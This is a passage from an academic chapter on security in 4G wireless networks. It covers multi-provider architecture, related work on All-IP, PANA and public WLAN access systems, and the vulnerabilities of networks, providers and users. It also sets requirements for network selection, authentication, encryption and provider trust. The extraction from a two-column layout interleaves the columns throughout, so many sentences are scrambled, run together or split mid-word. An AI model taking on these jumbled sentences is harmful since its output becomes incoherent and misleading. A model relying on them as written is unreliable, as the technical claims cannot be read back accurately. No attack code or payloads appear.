often perceived as too expensive. QoSinthemulti-servicesnetworkismoredifficult
To be able to provide cost-effective data ser- to maintain because very different requirements
vices at any chosen place in the world we need have to be fulfilled by the same infrastructure
more user-oriented and data-centric approaches Yet, owing to this common homogeneous infra-
than what 2G and 3G paradigms deliver. At least structure, with the network-oriented design it is
in the mid-term, the hope here lies in a more op- still relatively easy to conceive systems enabling a
portunistic approach from the technological point comprehensive network management. The neces-
of view. Indeed, the user typically does not care sary dynamic infrastructure-to-service adaptation
about who provides a particular service and how. e.
( g., for QoS) can then be achieved using the
The user cares about the availability of services, integrated management functions.
their performance (throughput, latency, etc.), the The step to the user-oriented design potentially
quality of service QoS) ( i.
( e. the performanceimplies a broad diversification of data transpo
and the variation of the performance factors), the technologies providing different services. Thus,
ease of use, and service prices. Accordingly, the the resulting systems inherit the problems of the
user-oriented design tries to respond to these user dynamicper-serviceQoSprovision.Additionally,
wishes assuring the possibility to freely choose an we run into difficulties trying to consolidate a
0
Security in 4G
these different technologies and make them do what It is composed of a panoply of service provider
the operator wants. This applies to the network networks (SPNs) connected by an IP-based core
management in general. In particular, it concerns network for any global data exchanges. SPNs
thementionedQoSprovisionproblematic andalso
principally support different wireless ANs. AN
raises diverse security considerations, both of the technology can range from personal to wide area
operators (infrastructure control and protection, networks.
resource usage control, accounting and billing) Each provider may, but is not required to, have
andofusersdata ( confidentiality,location its ownprivacy,
users and propose multiple services over
awless
fl billing). differentANs.Usersaredefinedaslogicalsystem
Hence, the user-oriented design opens new pos- identities subject to the service contract between
sibilities but potentially results in a heterogeneous two legal bodies, one representing the provider
environment. To be deployed and maintained by and the other representing the served user. This
the operators, this environment needs to be un- definition implies that every user correspond
derstandable, manageable, exible, fl and
tosecure.
a service contract with exactly one provider.2
To be used, it needs to be user-friendly, reliable, Note that this contract requirement does not imply
and fair. In particular, users should be able to use any price models or restrictions. Since every user
different services over different infrastructures in corresponds to one legal body, we use these terms
the same, familiar manner. interchangeably in the rest of the document unless
Thus,weneedtodevelopmoreexible fl - infra
explicitly distinguished.
structures and more sophisticated mechanisms for The service contract provides the trust relation-
infrastructure access incorporating but hiding the ship and the set of authorizations. From the user’s
whole technological complexity. These mecha- point of view, the provider from the corresponding
nisms should provide adaptability to both users and service contract is called home provider. If a user
contents. Here we concentrate on heterogeneous usesaprovideronlyforuseridentification, - autho
network access mechanisms and the necessary cor- rization, and billing services, we call this provider
responding network management functions in the a virtual operator3 (Zhang, Li, Weinstein, & Tu,
scope of the future integrated environments. 2002). Virtual operators (VOs) can but do not need
to have their own infrastructures. Typical VOs are,
Multi-Provider Network Environment for example, 2G or 3G providers (because of their
existent user database), miscellaneous resellers
For 4G, the accent lies on users and the requested but also credit card issuers, banks, public remote
services (Pereira, .)02 For the exibility fl and
authentication services, and so forth.4
cost reasons, the 4G architecture has to be able to Providers may (but are not required to) serve us-
integrate different technologies to provide services ers for whom they are not home providers. Providers
to users. Services are divers offerings, commercial may propose access to services in their own and in
or free, ranging from a basic connectivity (e.g., to other infrastructures (e.g., in the Internet or in user’s
the Internet) to more sophisticated services such as home network). The necessary network intercon-
voice calls or instant messaging (IM). To provide nection can be based upon private infrastructure
more complex services, some providers can use interconnections of several providers or it can be
services proposed by other providers. based on a public backbone like the Internet. This
We see 4G as a potentially open, heterogeneous, and other definitions, for example, service level
user-oriented architecture, consisting of different agreements, price agreements, mutual agreements
service and ANs. These networks are operated on user authorization in visited networks, and so
by different authorities. We call such authorities forth are subjects of so-called roaming agreements
service providers1 if access to services is possible signed between the legal bodies representing the
over their respective infrastructures or networks. providers. Using these roaming agreements, pro-
The global 4G architecture is shown in Figure 0-1. viderscanverifyidentitiesandprofilesofvisit
users whom we call visitors.

Security in 4G
Figure 2. Global system architecture

G/GSM G/UMTS
PDP PDP
SPN A SPN B
IP backbone
PDP
SPN C SPN D
PDP
PSTN
WLAN C or LAN
Legend
Data traffic
Control traffic
PEP PDP PDP
SPN C Service Provider Network C
Theuserswhodonothaveanyverifiableservice SPNs are supposed to be trusted, non-public

contracts may be treated as guests. Guests are us- networks with appropriate protection measures.
ers with special authorizations (profiles) , locally
User traffic is to be strictly separated from th
andfreelydefinedbyanyoperator.Theseare thus
management traffic.Theinternalcommunications
local users and will not be treated differently in areIP-based.Inter-SPNmanagementtrafficcanbe
the following. protected by IP security (IPsec) (Kent & Atkinson,
1998), or by using dedicated protected links (L2
SPN Organization and Management virtual private network [VPN] services, trusted
sub-infrastructures, etc.)
Management tasks in the SPN are carried out Internal SPN architectures are deliberately left
by the SPN owner, that is, the provider. The ac- open. The protocols and mechanisms regarding
tions are based on the management policies that PEP, PDP, measurements, and so forth do not need
reflect provider and user requirements. tobe defined
For thisatthesystemlevel,because - thiscom
purpose, providers deploy policy decision points plexity can be hidden within the SPN entity. Our
(PDP), that is, logical entities capable of taking mainconcernistodefinearchitecturesthatdon
completely automated or assisted decisions based imposeanyspecificsolutions.Inaheterogeneous
ontheobservednetworksituationand thedefined
4G system with its different providers (in terms of
policy. Policy enforcement points (PEP) are in- size, available resources, locality, services, capi-
stalled in the control equipment to enforce made tal, etc.), this is an additional degree of freedom.
decisions. In particular, PEPs are installed in the Different approaches are principally suitable for
edge equipment.

Security in 4G
management purposes such as proprietary console the overlay access module that will implement
or Web-based management, SNMP (Case, Fedor, 4G signaling, 4G management, 4G security, 4G
Schoffstall, & Davin, 1990), COPS (Durham et transport, and so forth functions. An example for
al., 2000), GMPLS, and so forth. such architecture would be the well-known All-IP
approach discussed in the following sections.
Possible Approaches to 4g
Common Access Protocol
On a high abstraction level, three approaches to
4G are theoretically possible 4G (Varshney & The third possibility is to unify the access protocols
Jain, 2001). of the wireless networks, thus enabling users to
access the 4G network by some standard means.
Multimode Devices This possibility implies separation of the transport
and the control planes. Further, it is necessary to
Multimode devices (which already exist on the identify technology-specific functions that are
market, e.g., GSM/WiFi phones, PDAs with 802.11 part of the control plane. These functions have
WLAN, Bluetooth and GSM access modules, tobeexternalizedandreflectedbyanabstractio
smartphones with Bluetooth capabilities, etc.) eas- layer/abstraction application program interface
ily expand the effective coverage area managing the (API) that could then implement this common
cooperation issues by the installed software. This access protocol.
concept pushes the 4G connection management Note that this list is exhaustive (meaning that
complexity to the terminals, that is, it does not there are no other possible approaches to an in-
require any additional complexity in the wireless tegrated 4G system in the sense of the previous
networks. However, the terminal equipment has section). However, the mentioned alternative ap-
to integrate operational logics including not only proaches are not necessarily mutually exclusive. It
every technology-specific treatment but also the
is imaginable to have some combinations of these
translation of quite different technological param- generalhigh-levelapproachesinafinalsolution
eters to be able to make decisions. It is not clear In the following, we present some of the proposed
if this can be done in an economically reasonable 4G architectures classifying these according to the
fashion for multiple, very different technologies, in previous scheme.
particular taking into account the vertical (in the
senseoftheISO/OSImodel)complexityofQoS,related work
security, and mobility management.
Related Work on G Architectures
Overlay Networks
In Raivio (2001) the author discusses the currently
Another possibility is the installation of an overlay most popular approach to 4G. This approach is
network of 4G access points situated above the based on a common Internet core for different
actually available wireless networks. Note that in networks, unifying everything over IP and the
this approach the devices will still need to have related Internet Engineering Task Force (IETF)
several network interfaces to be able to access technologies. With respect to this so-called All-IP
the entire infrastructure. The distinction lies in (sometimes Full-IP) approach, the author briefly
the additional complexity, which is completely discusses the possibilities and the deficienci
shifted to the overlay. The requirements on the the concerned IETF protocols including the authen-
underlying technology are minimal. The overlay tication, authorization, and accounting framework
hastodefinethenecessarysignalingand transport
(AAA), Mobile IP, IPv6, IPsec, and SIP. The author
functions. Besides the physical access to the used points out that this approach is straightforward but
technology, the wireless device has to implement also problematic in terms of QoS, security, and
mobility management.

Security in 4G
The presented All-IP idea is the current state same quality as is the case in 3G. The authors
of the art approach in the high-level 4G research. claim that the networks beyond IMT20005 should
Intheclassificationgivenintheprevious be muchsection,
more location-registration oriented and
All-IP represents an overlay network approach. should identify the location registration manage-
The IP network is used as an overlay that integrates ment as a study topic. For instance, hierarchical
different technologies. IP technologies are used for or concatenated location registration techniques
both control and transport planes. IP base stations have to be studied. Then they discuss handover
are used as access points in that 4G vision. issues distinguishing local handovers and overall
In Otsu, Okajima, Umeda, and Yamao (2001) network handovers and identify this feature as a
the authors research a possible core network design further study object.
for 4G systems. Describing the current situation Trying to provide an infrastructure-independent
of the telecommunications and the predominance access to services and applications for highly mo-
of IP-based applications, they give an outlook bile users, Kellerer, Vögel, and Steinberg (2002)
on estimated traffic in the future generation present a solutionof
based on a communication gate-
wireless systems. Then they discuss possible way. Originally driven by an automobile environ-
wireless transmission characteristics in terms of ment, the basic idea is to install an intermediate
transmission bit rate, spectrum, area coverage, and element between the actual user equipment and
hierarchicalserviceareaanddefinesuch network
the serving networks. From the network point of
requirements as seamless connections, reduction view, such a communication gateway thus resides
in the number of control messages, short delay at within the end-system. Including caching and
handover, reduction of cost per bit, service integra- switching units, the gateway provides a general
tion based on IP, and movable network support. middleware interface to the applications. Thus,
Thenetworkarchitectureisthen core defined asa pushes the intelligence towards the
this approach
network (CN) connecting different ANs like a end-systems, trying to map user requests at their
future, yet-to-be-defined 4G-RAN, and already origin to available networks and services. In our
existing WLAN, 3G, and PSTN to the Internet. classification, this proposal represents the mu
CN and 4G-RAN are completely IP-based. The mode device approach.
terminals have IP-addresses assigned. The CN is Becchetti, Priscoli, Inzerillli, Mähönen, and
directly connected to 4G-RANs and the Internet Muñoz (2001) take a slightly different approach.
and uses gateways to connect to the public switched Mainly dealing with QoS support over - differ
telephone network (PSTN) and 3G. Mobility manent wireless infrastructures, they define a ne
agement is done by using the hierarchical Mobile intermediate layer between the IP and the second
IPv6 approach. Additionally, the article discusses layers. This wireless application layer (WAL) then
some issues in the 4G-RAN configuration. provides
In aQoS-genericinterfaceforIPfeaturing
other words, this proposal is an instantiation of uniform guaranteed link reliability and traf
the All-IP approach. control. The position of WAL in the ISO/OSI
Another All-IP proposal is discussed in Yu- model implies a hop-by-hop QoS agreement
miba, Imai, and Yabusaki (2001). The recognized logic. The details on the modular architecture of
requirementsherearehuge(IP-multimedia ) WAL,its classandassociationbased
traffic - QoSprovi
handling, advanced mobility management (MM), sion, Snoop TCP method to avoid congestions in
diversifiedradioaccesssupport,seamless the TCPservice,
layer can be found in the paper. In our
and application service support. The authors then classificationthisproposalisanoverlaypropos
discuss possible solutions for MM and seamless since WAL instances have to be integrated in the
services and name Mobile IP, Cellular IP, and terminals and in the access points. IP is used as
similar techniques. However, they recognize the a general transport in the All-IP manner, but the
deficienciesofsuchsystemssincetheyare hardlyheterogeneity is hidden within the
technological
suited to provide a mobility management of the WAL, which acts as a convergence sub-layer. WAL

Security in 4G
instances rely on SNMP to build the necessary authentication has to be completely restarted at the
decision bases and so forth. next visited PAA (even within the same network).
Such mechanisms could be a L3 (i.e., in the 4G
Related Work on G Security scope typically IP) context transfer protocol that
would allow arbitrary context transfers between
The user verification and network - access inPAAs.
different hetIETF will shortly publish its con-
erogeneous environments represents one of the text transfer protocolCTP) ( specification(Nakhjiri
major 4G problems. This is discussed later in Perkins, & Koodli, 2004) as an experimental
detail. One of the problems is the access protocol standard. However, the payload formats for CTP
but there are only some open questions concerning havetobespecifiedtoo.
the back-end trust architectures and multi-domain, The work on the public access wireless networks
multi-party AAA. (PAWNs) can be interesting in the 4G scope since
An interesting related work seems to be Zhang it has to practically resolve several problems very
et al. (2002). Introducing the concept of a so-called similar to the anticipated 4G problems. PAWNs are
virtual operator, the authors describe how an typically implemented with IEEE 802.11 technol-
authentication service reachable over the Internet ogy. Since the integrated 802.11 mechanisms are
could authenticate its users in a foreign hot spot insufficient for almost all typical PAWN areas
environment using AAA. As potential virtual (per user quality of service, system-wide mobility,
operators the authors see ISPs, content providers, security, user network access, etc.), the solutions
cellular operators, or pre-paid card issuers. To proposed for PAWNs are typically completely
reduce the number of necessary trust relationships decoupled from the underlying technology. Hence,
between potentially numerous hot spot operators the practical experiences gained in such installa-
and diverse virtual operators, the authors propose tions are of tremendous importance for the 4G
a commonly trusted broker entity. research.
IETF currently works on the protocol for car- An approach for WLAN hot spots providing
rying authentication for network access (Forsber, a secure wireless Internet access in public places
Ohba, Pati, Tschofenig, & Yegin, 2003) in its PANA is Microsoft’s CHOICE (Bahl, Balachandran, &
working group. PANA specifies an architecture Venkatachary, 2001). The authors build a network
very similar to the IEEE 802.1X architecture used that globally authenticates users and then securely
in this work for LAN/WLAN access. PANA is connects them to the Internet via a serving 802.11
link layer agnostic transporting authentication WLAN. A reasonable argumentation against IPsec
information between the PANA client and PANA for this purpose can be found in the publication.
authentication agent at higher layers. Since it is Introducing a new software module (PANS) instead
principally capable of identifying users, PANA of IPsec, the architecture promises authorization,
could thus be used as a common access proto- access control, privacy, security, last hop quality
col to heterogeneous networks. However, since of services, and accounting. However, this soft-
PANA has to access a higher level element, the ware (responsible for packet marking on mobile
L2 mostly remains unprotected. Also, after the hosts) has to be installed on all mobile terminals,
(unprotected) L2 establishment, the local PANA effectively modifying protocol stacks. The WLAN
client needs to discover its network’s pendant, the itself is open but does not allow any connections
PANA authentication agent (PAA). This involves to any other networks, except for HTTPS con-
discovery broadcasts and round trips. PANA here nections to the global authenticator (global MS
nicely illustrates the problems inherent to higher Passport service) and HTTP to the local Web
layer network access: questionable security, holes server where, for example, the software module
in the access controllers, broadcasting in the access can be downloaded. Network’s PANS authorizer
phase, and high network access latency. module obtains key information from the global
Besides, PANA does not optimally support authenticator after successful user authentication.
mobility: Without additional mechanisms, the The authorizer can also install all required policies.

Security in 4G
ItthenreroutesthetraffictoaPANSverifier. The organization. The latter point is

provider network
latter actively processes every packet checking the not discussed in the following.
mark/tag added by the PANS module running on
the mobile and providing, for example, per user 4g vulnerabilities
access control and accounting.
Mobility support for public WLANs is presented Vulnerabilities of Wireless Networks
in Friday et al. (2001). Using a similar packet tagging
approach as in CHOICE, the authors describe their Wireless networks are generally more vulnerable
GUIDE/GUIDE II systems. Originally meant for than their wired equivalents. Wireless security is
ametropolitanscaleaccessusingmodified client
a difficult problem that has to take into accoun
protocol stacks, GUIDE offers ordinary citizens the vulnerable medium per se (unclear network
secure and accountable Internet access over the perimeter, shared medium, naturally broadcast,
deployed 802.11 WLAN-infrastructure. GUIDE invisible/virtual network access), performance (se-
II adds handover management using Mobile IPv6. curity overhead, group communications), limited
IPv6 datagrams are tagged by clients using the handset capabilities (human-machine interface,
modifiedMobileIPv6stack.Programmableaccess CPU, and memory), battery constraints (sleep
routers ensure that only packets containing valid management, on/off behavior), and different user
access tokens get to the trusted core network. services (roaming, mobility, localization). These
Over an access router, users authenticate at an problems have been discussed in this work per
AAA authentication server. The latter distributes wireless technology in the (Hecker, 2005) per
session keys to the access router group and the wireless technology.
mobile terminal. User payload encryption is op- Heterogeneousness adds a new dimension to
tionally possible between the router and the user this discussion. It multiplies the number of avail-
equipment. able mechanisms and, from the point of view of
attacker, caters to more opportunities to attack
the overall system (weakest link). New attack
4g sEcurIty rEquIrEMEnts scenarios are conceivable: an attacker could use
a weakness within one access network and the
4G security measures have to provide protection systemic interdependencies to gain access to an-
for 4G users and 4G providers. other access network. Terminals can be attacked
There is no particular and evident reason why 4G over several available interfaces at the same time.
security could be easier to achieve than 3G or 2G The services have to be provided over several
security. On the contrary, there are several reasons interfaces, thus resulting in tighter performance
whyitcouldbeindeedmoredifficult,someof which and complexity. A typical example is
constraints
are discussed in the G4 Vulnerabilities section. One a handover between two different technologies
of the obvious reasons is the heterogeneity of the (called vertical handover), but the same has to be
4G system. Other reasons are provider inequality considered for sleep management (paging) and
and the envisioned connection ubiquity. generally for signaling.
Main security considerations in our 4G vision
refer to the open system interfaces. One of the Vulnerabilities of Service Provider
security targets is thus provider-provider interface. Networks
However, the most important and 4G-characteristic
target is the user-network interface (including the A 4G system encompassing different technologies
user-service interface6). In the following sections has to support complex management mechanisms
wediscussthesetopics,specificallydealing with signaling, etc.), which consider-
(control systems,
the user-network interface. ably add to the system complexity and thus repre-
Important, but not necessarily new, security sent a major vulnerability per se. This is especially
provisions must be considered in the internal true for a multi-provider and thus multi-authority

Security in 4G
environment where a mutual preliminary user- come an important accessory and manufacturers
network trust does not necessarily exist and must are doing their best to render them more portable
be established by some means (typically involving and more powerful at the same time. It is obvious
management subsystems and signaling before the that these devices have become an interesting
useridentitycanbeverified). target for thieves. Thus, physical device security
The serving network protection is one of the is an important but insufficient subject. Mobile
critical points to ensure service continuity and handsets can store important personal user data
investment in new infrastructures. From the secure (address books, access codes, professional data,
mobility discussions (such as Mobile IP security), personal medical information). Remote device
we know that visited networks are often overex- deactivation, blocking, and erasure seem important
posed to resource consumption and denial of ser- future security features.
vice. In our 4G vision, an SPN has to be protected A 4G user needs a particular protection to
from the users on the user-network interface and ensure his/her anonymity and an offer-consistent
from the outer world on its backbone interface(s), and verifiable billing. Without any protection, in
including protection from other providers. an international multi-provider 4G environment,
a user can be an easy target for both price fraud
User Vulnerabilities (charging wrong prices, charging incorrect usage)
and user tracking.
As a wireless user is vulnerable to unauthorized
data access, traps/impostors, and desinformation, Heterogeneous security
the user must be protected from abuse by third
parties and from the part of the serving SPNs. Current wireless technologies have different se-
Given a rising part of the M2M communications curity considerations and provide corresponding
and the wish for infrastructureless communica- securitydefinitionsinthestandards.Thelatte
tions, the user device is also vulnerable to attacks naturally dedicated to the respective link layer and
by other devices involved in the provision of the thus concentrate on the implementation within the
consumedservicesimpostors, ( datamodifications,
network interface cards, adapters, and so forth. In
datasniffing,man-in-the-middle)andbydevices 4G, different link layer technologies are likely to
consuming services provided by the user device coexist for the reasons explained in the previous
(denial of service, abuse). sections. Also, the focus changes: in the personal
Connected to multiple interfaces over several communications the security focus should be on
providers the device is naturally multi-homed. It users, not on network devices.
is potentially exposed to all attacks over the es- The problem with the characteristic 4G secu-
tablished connections, including malicious code rity is twofold. On the one hand, there are very
intrusion (viruses, spyware, and worms). basic open questions that have to be answered
User vulnerability includes headset vulner- by the ongoing research by weighing practical
ability. A typical 4G headset featuring several constraints against the required security level.
active interfaces is naturally exposed to different What is security in 4G if we do not know what
kinds of attacks, such as attacks on device drivers 4G looks like, what services it is supposed to
of the communication interfaces, attacks against provide, and in which environments it is going
the transport and signaling communication stacks, tooperate?Thesystemarchitectureiscrucialf
and attacks against all services potentially provided the security considerations. Additionally, we need
orassistedbytheheadsetitselfe. ( g.,file
trustsharing,
and threat models. What are the capabilities
localization, auto-update). An important and of- of potential attackers? Which ANs will be used
ten forgotten point is device theft. Today, mobile andhow?Trustmodelsshouldcorrespondtothe
devices are trendy and, having a rich and versatile probable usage scenarios. For instance, if users are
feature set, can be quite expensive. They have be- not “owned” by providers (Pereira, 2000), how can

Security in 4G
trustbeestablishedandtowhom?With allthat,
protection a
and revenue guarantees. Moreover, the
consistentsecuritypolicyhastobedefined L2 security along
measures are often implemented in the
with the security architecture, identifying technol- network interface hardware. Their design includes
ogy-independent subjects, objects, relationships, power consumption and computational resource
authorizations, threats, and protective measures. considerations. A higher level solution would be
This is however difficult and defines aimplemented problem in the device control logics, that is,
known as heterogeneous security). typically software. Given the constraints with the
On the other hand, there are practical problems 4G terminals (wireless security processing gap), it
concerning the technical applicability of solutions. would be wise to use the hardwired security solu-
The security solutions proposed by the wireless tions in the network adapter. Furthermore, in the
technologies are limited to the identified needs.
OSI logic, multiple links could lie between the user
They are thus different from technology to tech- and the used L3 device (router), but only one link is
nology reflecting its expected usage. Very often,
possible between the user and any used L2 device.
theyfailtofulfillthesecurityrequirements, - Thus, the L2typi security measures are guaranteed
cally because of conceptual or implementational tobeimplementedinthefirstnetworkentityth (
aws.
fl Buteveniftheirimplementationaccess iscorrect,
device), that is, next to the user, at the very
their scope is naturally wrong: as access security, edge of the network. That brings the security as
they aim to provide link security, but ultimately close to the user as possible and thus guarantees
providers need service access security and users physical infrastructure protection. Moreover, it
need personal data security. potentially scales better since the access devices
How can the defined security policy for arethedesignedtosupportafixednumber - ofconnec
entire system be applied and enforced to all system tions, including the connection properties to be
entities given that the available solutions are differ- enforced. Another point is that higher level security
ent,potentiallyawed, fl andlimitedtosystem solutionsparts?
cannot achieve the same user privacy. For
Forinstance,ifthesecuritypolicyidentifies instance, userlink
location privacy is in danger since
encryption as a necessary confidentiality - imple
lower layer addresses (such as world-wide unique
mentation, how can this be universally activated MAC addresses) cannot be hidden by higher layer
andwithwhichkeysandproperties?How canwemeasures.7
security
guarantee an adequate, comparable strength of the For reasons stated previously, we think that L2
differentencryptionmechanisms?Whatsecurity todowith is indispensable in 4G. This is by the way
the technologies that do not provide link encryp- also the most characteristic point of 4G: whatever
tion?Thesecuritypolicymustconsiderthe these cases
4G vision, everybody seems to agree that 4G
and provide answers to such questions. will be technology-opportunistic, incorporating
different wireless ANs in one system. The network
4g security layer access security is thus one of the major challenges,
typical and characteristic for 4G.
The aforementioned practical problems with the 4G
security can be avoided if the technology-depen- nEtwork AccEss sEcurIty
dent security measures are not used. Instead, all
security measures could be applied in the overlaid A particular security problem is bound to the user
technology. However, it is often insecure or at network access. The 4G user has a terminal with
leastinefficienttoenforcesecuritymultiple inthe overlay.
network interfaces. The security measures
For example, 2G/3G network providers rely on for each interface have been designed according
L2 security measures for network access control, to an initial security analysis during the technol-
frame integrity and link encryption. While the ogy standardization phase. Since the technologies
link encryption is not important for the provider, are meant for different purposes, the risks and the
the access control is primordial for infrastructure definedsecurityfunctionsarelikelytobedifferen

Security in 4G
Thesecuritymechanismsaredefinitely different.
vice setidentification(SSID) naming in the 802.11
Thus, every interface has different requirements on WLANs. Besides, in a dynamic 4G environment
credentials in terms of identities, expiration poli- with the very different proposed services, over
cies, initial trust representation, and so forth. These different technologies and with different prices,
requirementshavetobefulfilledsince it otherwise
is difficult to believe that a network ident
the interface could be unusable or the access by aloneisasufficientbaseforareasonablenetwork
the means of this interface impossible. If the user selection decision.
definitioninthesystemisconsistent,then the4G
In a user-centric environment, the network
user cannot be expected to use multiple identities: selection decision should be made based on
in 4G, every network provider needs to be able to physically available networks and channel quali-
identify any given user correctly, in particular in ties, user identity and user service authorizations
the different ANs, which the user might be using within the encountered networks, and on offered
simultaneously. That is important for the authori- service prices. Especially price display for a
zationsdefinedinthesecuritypolicy.It isequally
given user appears as one of the critical issues in
an important requirement for a consistent billing. a multi-provider environment characterized by
Network access can thus be divided into various continuous roaming between several different
sub-problems that are treated in more details in (big/small, national/local, etc.) providers. Indeed,
following. even in 2G with a typical limitation to a handful
of providers per location (2-8), users traveling to
Network Selection foreign countries have been known to feel badly
informed about pricing of out- and incoming calls.
In the outlined 4G vision, a free service choice is an In 4G with multiple-interface terminals and pos-
important design criterion. To provide that choice, sibly new business models, several providers can
users must be able to collect information on the be used at the same time, possibly offering similar
ANs of all available providers. Most importantly, services at prices depending on dynamic factors
this is required for the decision of which network such as current network usage (per-session price
the user should connect to. For instance, it cannot determination).
be generally assumed that every network is acces- The involvement in such rather complex pre-
sible for every user (e.g., because the user’s home authenticated (Hecker & Labiod, 2004) user-
provider does not have any roaming agreement network signaling represents major risks for both
with the provider of the detected network). network operators (infrastructure intelligence,
Network selection is a problem since some unpaid resource consumption, denial of service)
preliminary network access is necessary prior to and users (localization, tracking). Additionally,
authentication, which however should be limited optimizations are necessary to that recurrent
so as not to contradict the security policy. Net- process, which in 4G can be repeated in-session,
work selection thus represents a security-usability since it can have an important impact on mobility
compromise. performance (vertical handover).
In a dynamic multi-provider multi-technol-
ogy 4G environment, active exchanges (through User-Network Authentication
signaling, like network discovery) are necessary
since the existence of system-wide coherent net- A user-network authentication is necessary from
work identifiers do cannot be relied upon. network These
provider’s point of view to be able to
identifiershaveverydifferentmeanings - indiffer
enforce a reliable access control to its resources
ent technologies. For instance, if a 2G provider and to authorize requested service sessions in its
wants to deploy a supplementary data service infrastructure or at least a transport (connectivity
over an 802.11 WLANs, what should be used as a service) over its infrastructure. It is also required
networkidentifier?Thereisnoregulation ser- on home provider for authorization and
by the user’s
billing.

Security in 4G
From the user’s point of view, network authen- (notably the 802.11i introducing a different security
tication permits to verify the received network model). Nevertheless, this situation exemplifies
identity information, guarantees access to the the normality of a heterogeneous 4G: the secu-
correct environment, and thus permits to establish rity models, the trust presumed relationships, the
trust to the serving provider. It helps to eliminate technical possibilities and the vulnerabilities are
impostors and to protect against man-in-the-middle very different from technology to technology. The
attacks. resolution of this problem must not lead per se to
After the service information collection, some security problems. Thus, if the L2 authentication
networks can be eliminated by policy or user is to be used in the 4G scope, every technology
wishe. ( g.,apre-configurationofthetype“never hastofulfillaminimalcommonrequirementset.
use provider X” or rules like “always choose the Otherwise, higher level security has to be used and
cheapest available service”, etc.) Now, the user can the associated higher level access controllers have
actually access the required services over available to be collocated with the L2 access devices. If that
networks. A reliable user-network authentication cannot be guaranteed, this technology should be
is required at this moment at latest. considered unsuitable for 4G.
The L2 user-network authentication is a prob- From today’s perspective, the requirements on
lem in 4G since the logical and technological the L2 authentication are cryptographic strength,
requirements are very different from technology mutuality, and dynamic key material negotiation
to technology. We illustrate this on an arbitrary for the subsequent session protection. The key ma-
example, comparing UMTS and standard 802.11 terial negotiation should provide perfect forward
security. secrecy (PFS), that is, a successful attack on the
UMTS uses an external module (USIM) that produced key material should not give any clues on
hides the actual authentication method from the the long-term secret such as the used credentials.
used device and the visited network. The authenti- User location privacy should be supported, that is,
cated logical entities are the USIM and the visited ifpossible,anyuser-specificidentifiersshouldbe
network, represented by the authentication center unreadable for a third party.
(AuC). USIM is supposed to grant network access Note that we do not formulate any requirements
to the device (i.e., also to the user). The USIM on the authentication logic (how many parties
is capable of key derivation after a successful involved and how), used protocols, implementa-
authentication. tion, method placement, or on the used trust rep-
IEEE1 defines
2. 0 8 a handshake procedure resentation. However, authentication methods are
based on credentials existing between the net- generally hard to conceive and represent one of the
work (the access point) and the user. The whole most vulnerable parts of modern cryptosystems.
procedure (i.e., the authentication method, the Duetotheaws fl typicallyfoundintheauthentica-
exchanges, the cryptographic functions and the tion methods during their lifetime, and given the
success conditions) is hardwired in the network number of different authentication methods in 4G,
interfaces. The only authenticated entity is the we additionally require that the authentication
network interface of the user device (i.e., the ac- method be easily updateable.
cess point is not authenticated). The authentication Whatever the actual mechanisms is, it has to
does not derive any key material. Moreover, the correspond to the performance requirements in
procedures are almost useless because of several terms of possible vertical and horizontal mobility.
concept errors. Fast re-authentication (less RTT) and particularly
As can be seen, the provided services are very pre-authentication (over the same or a different
different in terms of capabilities and the achieved interface) seem useful in the 4G context.
security level. However, the purpose of this example
is not to blame WLAN security. Today, other secu-
rity models and methods are available for WLANs
0
Security in 4G
Data Encryption and Integrity Functions logging.

Principally, that mechanism can also be used
Different wireless technologies use very different in 4G. However, the differences between the pro-
link encryption and data integrity techniques based vidersizeandfinancialweightmustbeaccounted
on different mechanisms. Typically, shared-key for. In a multi-provider environment, it cannot be
mechanisms are used for both link encryption and reasonably assumed that all providers will still
data integrity. The actually used key is usually trust each other. Another point is that bilateral
derived from the key material established by the agreements are not a scalable approach for a big
authentication function. number of providers (O(n2)).
Very often proprietary solutions are imple- From the WiFi network experience, we know
mented both for encryption and data integrity. that instead providers use additional trusted enti-
The needs of the used encryption and integrity tiesastheirofficialroamingcontractpartner.Su
mechanisms in terms of key properties (format, trusted entities are either special brokers or pro-
length, known weak keys, etc.) and the optionally vider associations acting as separate legal bodies.
used initialization vectors are very different. The This approach permits to reestablish trust and to
provided security levels are also quite different. minimize the number of bilateral contracts.
Thus, the situation of these functions is similar to To ensure correct billing and charging providers
the user-network authentication. If some minimum often rely on external billing services and involve
requirementscannotbefulfilled,these third have party
tobeclearing houses e. ( g., financial audit
replaced (e.g., in the overlay) or the technology institutions certifying the correctness of the bills
could not be used. and the processes).
Simultaneously, both functions are in use
during the whole session. Thus, their power and other security Problems
resource consumption is particularly critical. For
that reason, we think that both encryption and The remaining security issues mainly concern
integrity functions should be implemented in the the SPN, its integrity, and its internal interfaces.
associated network adapter (hardwired or in form Network engineering techniques such as ow fl
of hardwired cryptographic bricks connected by and traffic separation, filtering, and continuous
thesoft-wiredfirmwaredefinitions)Both . functions
monitoring are classically used to achieve a good
must use the key material derived during the last security level.
authentication session and support rapid re-keying, This is not an easy problem to solve. However,
both periodical and on-demand. Ideally, both func- its exact resolution highly depends on the actually
tions should be cryptographically strong. However, responsible provider: both the security needs and
ifaws
fl aredetected,therapidre-keyingthe can help capabilities will change depending
technical
mitigate the problem by changing the encryption on the provider size. That is why, at this moment,
keys very often. we prefer to hide the complexity within the SPN
body.
Provider-Provider security
In 2G/3G providers usually sign preliminary bi- APProAcHEs to 4g sEcurIty

lateral contracts known as roaming agreements.
Such agreements build the basis for mutual user Intheprevioussectionwedefinedseveral - require
authentication, authorization, service and charging. ments on 4G security. 4G systems are still in an
Every provider thus sets up a special subsystem earlyconceptphaseandspecificrealizationsdonot
serving AAA requests from other providers, act- yet exist. However, different approaches are pos-
ing as peers. Such requests are as such subject to sible to achieve the technology-spanning security
prudent access control, authorization, and extensive mechanisms, often required.

Security in 4G
virtualization tion, requirements on all mechanisms need to be

thoroughlyspecified.
Virtualization is an important means of integrat-
ingexibility
fl inthesystemdesign.Virtualization Adaptation
specifies what is to be done but not how it should be
done. In other words, different behaviors accessible Adaptation refers to dynamic changes within the
andcorrespondingtothesamespecified interfaceof the communicating parties.
implementations
can be used (sometimes interchangeably) during This could concern the user terminal security
the system runtime. The instantiation can happen measures and the provided network and service
bypre-configuration,throughsoft-andfirmware environment.
updates or even dynamically, at request. Adaptation could rely on different profiling
Examples for virtualization include the GSM mechanisms, including machine learning. How-
and UMTS security (GSM 11.11, n.d.; 3rd Genera- ever, in the telecommunications context, it could
tion Partnership Project [3GPP] TS 33.102, n.d.) also involve more pragmatic signaling-based ad-
but also, for example, EAP in IEEE 802.1X (2001) aptation. Given the current network situation, the
and 802.11i (IEEE Draft, n.d.). The approaches to used access network technology and an extensive
the virtualization are very different. user-network signaling capable of expressing user
